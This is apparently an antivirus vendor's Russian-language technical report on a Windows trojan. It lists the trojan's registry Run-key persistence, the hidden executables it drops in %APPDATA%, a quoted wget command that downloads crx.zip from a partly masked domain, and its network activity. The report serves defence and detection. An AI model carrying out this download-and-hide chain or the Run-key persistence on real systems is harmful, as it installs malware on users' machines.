Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'General Browsers' = '<SYSTEM32>;%WINDIR%;<SYSTEM32>\Wbem'
Вредоносные функции:
Создает и запускает на исполнение:
- '%APPDATA%\wget.exe' -O "C:\Twains_64\%USERNAME%\crx.zip" "http://ki###edya.org/Crx.zip"
- '%APPDATA%\install_browser.exe'
Изменения в файловой системе:
Создает следующие файлы:
- %APPDATA%\unzip.exe
- C:\Twains_64\%USERNAME%\crx.zip
- %APPDATA%\install_browser.exe
- %APPDATA%\wget.exe
Присваивает атрибут 'скрытый' для следующих файлов:
- %APPDATA%\unzip.exe
- %APPDATA%\wget.exe
- %APPDATA%\install_browser.exe
Сетевая активность:
Подключается к:
- 'ki###edya.org':80
TCP:
Запросы HTTP GET:
- ki###edya.org/Crx.zip
UDP:
- DNS ASK ki###edya.org
Другое:
Ищет следующие окна:
- ClassName: 'Indicator' WindowName: '(null)'
